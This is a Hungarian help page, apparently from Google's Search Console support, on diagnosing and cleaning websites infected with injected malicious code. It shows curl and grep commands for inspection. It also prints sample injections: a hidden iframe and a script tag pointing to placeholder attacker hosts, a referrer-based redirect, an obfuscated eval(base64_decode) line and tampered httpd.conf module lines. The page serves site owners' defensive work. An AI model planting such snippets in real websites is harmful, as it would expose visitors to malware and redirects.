Rosszindulatú programmal való fertőzés típusa: kódbeékelés

Mit jelent, hogy a Google Search Console-on az oldalak „Kódbeékelés” típusú rosszindulatú programmal fertőzöttként vannak megjelölve?

Azt jelenti, hogy webhelyén az oldalakat úgy módosították, hogy rosszindulatú kódot, például rosszindulatú programmal támadó webhelyre mutató iframe-et tartalmazzanak.

A Mérje fel a kárt (rosszindulatú programmal feltört webhely) oldalon további általános információt talál a rosszindulatú programokkal kapcsolatban.

Hogyan vizsgálhatom meg, hogy „kódbeékelés” típusú rosszindulatú programmal való fertőzésről van-e szó?

Először is, semmiképpen ne böngészőt használjon a webhelyén lévő fertőzött oldalak megtekintéséhez. A rosszindulatú programok gyakran a böngésző sebezhetőségeit kihasználva terjednek, tehát kárt tehet számítógépében, ha rosszindulatú programmal fertőzött oldalt nyit meg a böngészőjében.

Érdemes a cURL vagy a Wget segítségével indított HTTP-kérésekkel ellenőriznie a webhely állapotát (például kérje le az egyik oldalt). Ezek az ingyenes eszközök az átirányítások diagnosztizálásában segítenek, és elég rugalmasak ahhoz, hogy tartalmazzák a hivatkozói vagy user-agent információkat. Azzal, hogy a rosszindulatú tartalmat csak adott user-agentekkel vagy hivatkozókkal rendelkező felhasználóknak jeleníti meg, a hacker több „valódi embert” tud megcélozni, és eredményesebben tudja elkerülni azt, hogy a webhelytulajdonosok vagy a rosszindulatú programokat kereső szoftverek felfedezzék őket. (Webhelyének online állapotban kell lennie az eszközök használatához.)

Például:

$curl -v --referer <hivatkozó mező> --user-agent "Mozilla/5.0 (
  Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.30 (KHTML, like Gecko) 
  Chrome/12.0.742.112 Safari/534.30" <az Ön URL-je>
mint például
$curl -v --referer "http://www.google.com" --user-agent "Mozilla/5.0 
  (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.30 (KHTML, like Gecko) 
  Chrome/12.0.742.112 Safari/534.30" http://www.example.com/page.html

Ezután jelentkezzen be fájlrendszerébe. Vizsgálja meg az összes olyan erőforrást, amely a „kódbeékeléssel” fertőzött URL-ekre ír. Íme néhány példa a rosszindulatú kóddal való fertőzésre:

<iframe frameborder="0" height="0" src="http://<támadó webhely>/útvonal/fájl" 
  style="display:none" width="0"></iframe>
<script type='text/javascript' src='http://rosszindulatu-tamado-webhely/js/x55.js'></script>
<script>
  if (document.referrer.match(/google\.com/)) {
    window.location("http://rosszindulatu-tamado-webhely/");
  }
</script>
eval(base64_decode("aWYoZnVuaauUl+hasdqetiDi2iOwlOHTgs+slgsfUNlsgasdf"));
#httpd.conf modified by the hacker
LoadModule harmful_module modules/mod_harmful.so
AddModule mod_harmful.c
  • támadó webhelyre mutató iframe
  • JavaScript vagy más szkriptnyelv, amely támadó webhelyről hív meg és futtat szkripteket:
  • A böngészőt támadó webhelyre átirányító szkript
  • Az észlelés elkerülése érdekében álcázott rosszindulatú kód
  • Megosztott objektumfájlok, amelyek arra szolgálnak, hogy véletlenszerűen ártalmas kódot írjanak az egyébként ártalmatlan szkriptekbe

Vizsgálja meg a webhelyen lévő összes olyan kódot, amely ártalmas lehet. Az iframe-kód megtalálásához érdemes lehet szavakra, például az [iframe] kifejezésre rákeresni. További hasznos kulcsszó lehet a „script”, az „eval” és az „unescape”." Unix-alapú rendszerek esetében például:

$grep -irn "iframe" ./ | less

Hogyan tisztíthatom meg webhelyemet a „kódbeékelés” típusú rosszindulatú programoktól?

Ha készen áll webhelye megtisztítására, akkor lecserélheti az érintett fájlokat a legutolsó érintetlen biztonsági másolatokra, vagy eltávolíthatja a beékelt kódot az oldalakról, valamint a kapcsolódó szkriptekből és fájlokból. Ha szerverkonfigurációs fájlokat módosított, előfordulhat, hogy újra kell indítania a webszervert a módosítások életbe léptetéséhez.

Felhívjuk figyelmét, hogy a rosszindulatú kód eltávolítása nem javítja ki a háttérben lévő sebezhetőséget, amellyel a hacker feltörte a weboldalt. Ha nem javítja ki a probléma forrását, előfordulhat, hogy webhelyét a jövőben ismét feltörik. A feltört webhelyekkel kapcsolatos Súgó tájékoztatást nyújt a teljes weboldal megtisztításáról, és nem csak a szóban forgó rosszindulatú programtípus eltávolításáról.

Hasznosnak találta?
Hogyan fejleszthetnénk?